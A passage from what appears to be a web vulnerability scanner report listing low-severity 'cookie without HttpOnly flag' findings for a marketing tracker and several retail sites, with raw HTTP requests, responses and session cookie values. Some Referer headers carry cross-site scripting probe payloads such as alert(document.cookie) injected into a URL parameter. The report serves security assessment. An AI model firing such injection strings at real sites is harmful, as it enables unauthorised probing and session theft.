SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A40+PM&SMCID=335; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.23. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSCCCBAC=AELLEKHANGAPFICNHMGNHGJD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//burp/show/3 HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP; ASPSESSIONIDSQCBADBD=MEGJHKHABODBOAELGBOKJDAP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDQSCCCBAC=AELLEKHANGAPFICNHMGNHGJD; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.24. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQQDDBDAA=GHNAELHAJPJIDCMAHKGCBJKA; path=/
SM=GUID=2d4775d4%2Dfb95%2D4d54%2D9930%2D925441f9d73b&AID=&LastVisitDate=5%2F16%2F2011+6%3A41%3A30+AM&SMCID=40000710; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//burp/show/2 HTTP/1.1
Host: tracking.searchmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:41:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=2d4775d4%2Dfb95%2D4d54%2D9930%2D925441f9d73b&AID=&LastVisitDate=5%2F16%2F2011+6%3A41%3A30+AM&SMCID=40000710; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQQDDBDAA=GHNAELHAJPJIDCMAHKGCBJKA; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.25. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSQBAADBD=MGEOBAEACJECNMADMMAOBPAK; path=/
SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A56+PM&SMCID=40000710; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=40000710&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A39+PM&SMCID=335; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A56+PM&SMCID=40000710; expires=Tue, 14-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSQBAADBD=MGEOBAEACJECNMADMMAOBPAK; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.26. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQSBDDAAD=EBEEKPHAJPEKOEANAOKLBJBP; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//www.toshibadirect.com/td/b2c/laptops.to%3Fpage%3DsegHHO HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP; ASPSESSIONIDSQCBADBD=MEGJHKHABODBOAELGBOKJDAP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDQSBDDAAD=EBEEKPHAJPEKOEANAOKLBJBP; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.27. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQBBACAC=IMKLNPHAIHANNJOKPAINKDNO; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=208&x=http%3A//burp/show/10 HTTP/1.1
Host: tracking.searchmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A52%3A53+AM&SMCID=208; ASPSESSIONIDQQDDACAB=IBBDALHAJPIOCDKLGEGILEKL; ASPSESSIONIDSQBBCDAB=CCDJOAIAGEOOOLFLLHMIPMJD

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:55:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQBBACAC=IMKLNPHAIHANNJOKPAINKDNO; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.28. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSCTDCCCA=HHFGMAIAGMMLMIPCCOJGPAAI; path=/
SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A52%3A54+AM&SMCID=208; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=208&x=http%3A//burp/show/8 HTTP/1.1
Host: tracking.searchmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A
Cookie: SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A41%3A29+AM&SMCID=40000710; ASPSESSIONIDQQDDACAB=IBBDALHAJPIOCDKLGEGILEKL

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:52:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=496d877e%2Dbdb1%2D4dc3%2Da1b7%2D642ba750094b&AID=&LastVisitDate=5%2F16%2F2011+6%3A52%3A54+AM&SMCID=208; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSCTDCCCA=HHFGMAIAGMMLMIPCCOJGPAAI; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.29. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSASDDCDB=PHOJCLHAAKDHGJHMGAIOEMIH; path=/
SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A34%3A12+AM&SMCID=40000710; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=40000710&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A16%3A29+AM&SMCID=208; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:34:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A34%3A12+AM&SMCID=40000710; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSASDDCDB=PHOJCLHAAKDHGJHMGAIOEMIH; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.30. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSCTADBAC=JAHNNOHACCPGBOKOALHMMABP; path=/
SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A47%3A15+AM&SMCID=110; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=110&x= HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP; ASPSESSIONIDSQCBADBD=MEGJHKHABODBOAELGBOKJDAP; ASPSESSIONIDQSBDDAAD=EBEEKPHAJPEKOEANAOKLBJBP; ASPSESSIONIDSSABBDDC=HEBHOOHAABLOMBLEIKLLKIBH

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A47%3A15+AM&SMCID=110; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSCTADBAC=JAHNNOHACCPGBOKOALHMMABP; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.31. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQSDCCAAC=NKIDDLHABDBPEELKKKKDDKMA; path=/
SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A16%3A30+AM&SMCID=208; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=208&x=http%3A//app.gnc.com/profile/profile.cfm HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F15%2F2011+9%3A53%3A46+PM&SMCID=40000710; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A16%3A30+AM&SMCID=208; expires=Wed, 15-Jun-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDQSDCCAAC=NKIDDLHABDBPEELKKKKDDKMA; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.32. http://tracking.searchmarketing.com/welcome.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tracking.searchmarketing.com
Path:	/welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQCAACBC=ALMEDLHANCEGBMEKJHPFBHLG; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=40000710&x=http%3A//burp/show/2 HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDABCAC=DHOEMODALDECLOEFAICIABBD; ASPSESSIONIDQARDDBAD=CIPBBPDABBMIADGEALJIDLAH; ASPSESSIONIDSAQCDDDB=LPIJBAEAIIJKBDGLBMKCEIBP; ASPSESSIONIDQSBCDAAD=HIIMJAEABDIPKLEIOLDEJJBD; ASPSESSIONIDSQCDADBB=ONFBGAEAPGGGGFKJHHAKHFAK; ASPSESSIONIDQARCABAD=FPOPCJHAPDLDILBAKAIDENAK; SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=5%2F16%2F2011+6%3A23%3A37+AM&SMCID=40000710; ASPSESSIONIDSASDDCDB=MOHICLHANAOKJIJNBEMAPPKP

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQCAACBC=ALMEDLHANCEGBMEKJHPFBHLG; path=/
Cache-control: private

GIF89a...................!.......,...........T..;

13.33. https://www.acehardware.com/checkout/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.acehardware.com
Path:	/checkout/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=Rjt8NRQJqLlKLY2QvvNl013snyns5JqFczHh6fVfwf3D2h7Zw8bJ!1001950354; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.34. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bhphotovideo.com
Path:	/c/browse/Underwater-Equipment/ci/11585/N/4294551294

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=2STpNQ5TWC!-112699937; domain=bhphotovideo.com; path=/
TS29f0cc=c688b8f92f50d9b7e80f755703dbb3d6871d7ea6dc67d58e4dd0f99460ac0ec5f5b84ed0b092ce85bc587bdd; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.35. http://www.bluefly.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bluefly.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Path=/
SSRT=e4XQTQE; path=/; domain=.bluefly.com; expires=Tue, 15-May-2012 02:01:31 GMT
TLTHID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
TLTSID=6B1BA5627F60107F23AEA0F517B78A48; Path=/; Domain=.bluefly.com
_714bc2c9=guest; Expires=Tue, 15-May-2012 02:01:31 GMT; Path=/
CS_TRACKER_ID=uhf1oJlXUcjz8j8R-h2xrg**.bluefly_node12; Expires=Sat, 03-Jun-2079 05:15:38 GMT
TS18d374=e7c2bf9d5c17e0294f3546cf4c9ad3fb60874fe9f20602d14dd0857b; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.36. http://www.brookstone.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.brookstone.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A7CBB8B14AF4D3D7C9E71E4E03DC5C7B; Path=/
TS657dfa=4cb6f2f3222314ecede9aa2b629210ff8800c36175680b534dd085c960ac0ec5d3282da8; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 05:02:49 GMT
Set-Cookie: JSESSIONID=A7CBB8B14AF4D3D7C9E71E4E03DC5C7B; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:02:50 GMT
Set-Cookie: TS657dfa=4cb6f2f3222314ecede9aa2b629210ff8800c36175680b534dd085c960ac0ec5d3282da8; Path=/
Content-Length: 75023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...

13.37. http://www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.brookstone.com
Path:	/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=F1D08AEDE471B4630D873CF1AA19CFA3; Path=/
TS657dfa=ae893fcd6f83db1d4dcea9b7b38a4764e754034066e5db8e4dd0fdfd60ac0ec569d69bc7; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543278247%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3Dworldlandingpage_outdoor_living%257Ccxtopnav1fdt%257Coutdoor_living%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Doutdoor%25252520living%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-and-patio-furniture_Outdoor-Wood-Furniture.html_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 13:35:41 GMT
Set-Cookie: JSESSIONID=F1D08AEDE471B4630D873CF1AA19CFA3; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
